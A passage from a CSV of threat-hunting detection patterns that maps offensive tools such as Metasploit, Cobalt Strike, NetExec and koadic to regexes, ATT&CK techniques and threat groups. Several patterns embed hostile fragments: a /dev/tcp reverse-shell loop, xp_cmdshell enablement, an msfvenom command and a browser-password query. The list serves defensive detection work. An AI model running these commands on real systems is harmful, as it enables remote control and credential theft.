TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","43423" 
"*exe_to_dll.exe*",".{0,1000}exe_to_dll\.exe.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","N/A","5","10","1297","197","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z","43424" "*exe_to_dll.exe*",".{0,1000}exe_to_dll\.exe.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts an EXE so that it can be loaded like a DLL.","T1055.002 - T1073.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/hasherezade/exe_to_dll","1","1","N/A","N/A","8","10","1297","197","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z","43425" "*exe_to_dll_*.zip*",".{0,1000}exe_to_dll_.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","N/A","5","10","1297","197","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z","43426" "*exe_to_dll_*_32bit.zip*",".{0,1000}exe_to_dll_.{0,1000}_32bit\.zip.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts an EXE so that it can be loaded like a DLL.","T1055.002 - T1073.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/hasherezade/exe_to_dll","1","1","N/A","N/A","8","10","1297","197","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z","43427" "*exe_to_dll_*_64bit.zip*",".{0,1000}exe_to_dll_.{0,1000}_64bit\.zip.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts an EXE so that it can be loaded like a DLL.","T1055.002 - T1073.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/hasherezade/exe_to_dll","1","1","N/A","N/A","8","10","1297","197","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z","43428" "*exe_to_dll-master*",".{0,1000}exe_to_dll\-master.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - 
TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","N/A","5","10","1297","197","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z","43429" "*exe_to_dll-master*",".{0,1000}exe_to_dll\-master.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts an EXE so that it can be loaded like a DLL.","T1055.002 - T1073.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/hasherezade/exe_to_dll","1","1","N/A","N/A","8","10","1297","197","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z","43430" "*exe2bat.cpp*",".{0,1000}exe2bat\.cpp.{0,1000}","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","N/A","6","2","172","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z","43431" "*exe2bat.exe*",".{0,1000}exe2bat\.exe.{0,1000}","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","N/A","6","2","172","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z","43432" "*exe2powershell.cpp*",".{0,1000}exe2powershell\.cpp.{0,1000}","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","N/A","6","2","172","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z","43433" "*exe2powershell.exe*",".{0,1000}exe2powershell\.exe.{0,1000}","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","N/A","6","2","172","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z","43434" "*exe2powershell-master*",".{0,1000}exe2powershell\-master.{0,1000}","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","N/A","6","2","172","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z","43435" "*exec 5<>/dev/tcp/*/*;cat <&5 | while read line; do $line 2>&5 >&5; done*",".{0,1000}exec\s5\<\>\/dev\/tcp\/.{0,1000}\/.{0,1000}\;cat\s\<\&5\s\|\swhile\sread\sline\;\sdo\s\$line\s2\>\&5\s\>\&5\;\sdone.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","43439" "*exec CMD=/bin/sh -f elf -o *.elf*",".{0,1000}exec\sCMD\=\/bin\/sh\s\-f\self\s\-o\s.{0,1000}\.elf.{0,1000}","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. 
It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","APT32 - Black Basta","Resource Development","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","0","#linux","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43440" "*EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell*",".{0,1000}EXEC\ssp_configure\s\'show\sadvanced\soptions\',\s1\;\sRECONFIGURE\;\sEXEC\ssp_configure\s\'xp_cmdshell\',\s1\;\sRECONFIGURE\;\sEXEC\sxp_cmdshell.{0,1000}","offensive_tool_keyword","POC","CVE-2024-29824 POC exploitation","T1190 - T1105 - T1210","TA0001 - TA0002 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/horizon3ai/CVE-2024-29824","1","0","N/A","N/A","10","1","22","6","2024-06-12T14:04:39Z","2024-06-12T13:53:32Z","43442" "*exec tun2socks*",".{0,1000}exec\stun2socks.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","43443" "*Exec_Command_Silent.vbs*",".{0,1000}Exec_Command_Silent\.vbs.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","43444" "*Exec_Command_WithOutput.vbs*",".{0,1000}Exec_Command_WithOutput\.vbs.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security 
of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","43445" "*exec_payload_msi*",".{0,1000}exec_payload_msi.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43446" "*exec_shellcode.rb*",".{0,1000}exec_shellcode\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43447" "*ExecCmdImplant*",".{0,1000}ExecCmdImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","43448" "*Exec-Command-Silent.vbs*",".{0,1000}Exec\-Command\-Silent\.vbs.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","43449" "*Exec-Command-Silent.vbs*",".{0,1000}Exec\-Command\-Silent\.vbs.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","43450" 
"*--exec-method smbexec*",".{0,1000}\-\-exec\-method\ssmbexec.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","43451" "*execmethod*PowerPick*",".{0,1000}execmethod.{0,1000}PowerPick.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - 
Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","43452" "*execmethod*PowerShell*",".{0,1000}execmethod.{0,1000}PowerShell.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice 
Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","43453" "*execPayloads.txt*",".{0,1000}execPayloads\.txt.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","43454" "*exec-sc-rand.ps1*",".{0,1000}exec\-sc\-rand\.ps1.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","Molerats","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","1","N/A","N/A","10","10","1392","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z","43455" "*ExecStartPre present! 
ExecStartPre was modified!*",".{0,1000}ExecStartPre\spresent!\sExecStartPre\swas\smodified!.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","43456" "*Executable_Files-main.zip*",".{0,1000}Executable_Files\-main\.zip.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","43457" "*Execute command without file backdoor*",".{0,1000}Execute\scommand\swithout\sfile\sbackdoor.{0,1000}","offensive_tool_keyword","Telemetry","Abusing Windows Telemetry for persistence through registry modifications and scheduled tasks to execute arbitrary commands with system-level privileges.","T1053 - T1547 - T1059","TA0003 - TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/Imanfeng/Telemetry","1","0","N/A","N/A","9","2","140","13","2020-07-02T09:41:27Z","2020-06-24T16:30:44Z","43458" "*execute PowerShell without powershell.exe*",".{0,1000}execute\sPowerShell\swithout\spowershell\.exe.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - 
T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","43459" "*Execute('SELECT origin_url,username_value,password_value,length(password_value*",".{0,1000}Execute\(\'SELECT\sorigin_url,username_value,password_value,length\(password_value.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","43460" "*EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;'*",".{0,1000}EXECUTE\(\'sp_configure\s\'\'xp_cmdshell\'\',1\;reconfigure\;\'.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","43461" "*execute/host/spawnproc_explorer*",".{0,1000}execute\/host\/spawnproc_explorer.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","43462" "*execute_assembly SharpCloud*",".{0,1000}execute_assembly\sSharpCloud.{0,1000}","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","0","N/A","N/A","10","2","171","29","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z","43463" "*execute_bof *",".{0,1000}execute_bof\s.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","N/A","10","10","657","130","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z","43464" "*execute_dotnet_assembly.*",".{0,1000}execute_dotnet_assembly\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. 
By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43465" "*execute_embed_docm(*",".{0,1000}execute_embed_docm\(.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","N/A","10","","N/A","","","","43466" "*execute_payload(priv_esc*",".{0,1000}execute_payload\(priv_esc.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","43467" "*execute_pe -PE*",".{0,1000}execute_pe\s\-PE.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","43468" 
"*execute_Pezor*",".{0,1000}execute_Pezor.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","43469" "*execute_shellcode *",".{0,1000}execute_shellcode\s.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z","43470" "*Execute-ACLight.bat*",".{0,1000}Execute\-ACLight\.bat.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","N/A","AD 
